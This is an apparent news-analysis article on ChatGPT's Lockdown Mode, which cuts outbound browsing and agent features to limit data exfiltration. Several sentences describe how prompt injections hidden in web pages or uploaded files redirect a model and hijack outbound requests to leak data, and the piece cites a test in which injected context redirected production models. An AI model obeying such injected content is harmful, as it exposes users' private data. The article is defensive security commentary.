OpenAI added an optional security setting called Lockdown Mode to ChatGPT on June 6, cutting off the outbound network paths that attackers use to exfiltrate data through prompt-injection attacks. The feature is available now on Free, Go, Plus, Pro, and self-serve Business accounts. Enterprise admin controls remain separate.
The mechanism is deliberate and narrow. Lockdown Mode disables live web browsing, web image retrieval, Deep Research, and Agent Mode. Cached web content, image generation, file uploads, and standard chat remain functional. The design choice reflects the actual threat model: prompt injections often work by hijacking an outbound request, so removing the outbound requests limits the damage even when the injection itself succeeds.
OpenAI’s documentation on this point is worth noting because it is unusually plain. The help page states directly that Lockdown Mode does not prevent a prompt injection from appearing in content ChatGPT processes. An injected payload inside a cached page or an uploaded file can still alter the model’s behavior. The feature reduces exfiltration surface, not injection surface. Most enterprise security announcements oversell the scope of protection; OpenAI is underselling it, which is the more defensible posture if the claim ever gets stress-tested.
The trade-off is real. Turning on Lockdown Mode means surrendering the agentic capabilities that justify a ChatGPT subscription for autonomous workflows. Deep Research and Agent Mode are the product’s highest-leverage features for anyone using it to work rather than chat. Security-conscious teams will have to choose between defensive defaults and operational reach. That is not a flaw in the design; it is an honest acknowledgment that the two goals pull against each other.
This release fits a pattern that has been building across the inference stack. Anthropic’s Glasswing distribution model and its Mythos security consortium are addressing trust and isolation at the deployment layer. The Kasra hack test demonstrated that injected context can redirect frontier models in production. Vercel’s BotID post documented credential and inference theft at the API layer. Each of those developments treats the inference-time security perimeter as incomplete. Lockdown Mode is a consumer-facing expression of the same diagnosis: the model will process whatever it is given, so the viable defence is restricting what it can touch.
What OpenAI has built here is less a security solution and more a security posture selector. Users who need to protect sensitive data during a session can flip the toggle and accept reduced functionality. Users who need agent capabilities cannot. The honest framing in the docs suggests OpenAI is positioning this as one layer in a stack rather than a complete fix, which is the correct framing. Whether that nuance survives procurement conversations at large organisations is a different question.
For teams currently evaluating ChatGPT for agentic workflows involving sensitive internal data, Lockdown Mode clarifies the architecture decision: you cannot have ambient agent access and strong exfiltration controls simultaneously in the current product. That constraint should inform whether ChatGPT’s agent layer belongs in a workflow that touches privileged documents, or whether a more isolated deployment model is the right call.
OpenAI (help.openai.com), published 2026-06-06. Also covered by TechCrunch and The Decoder.
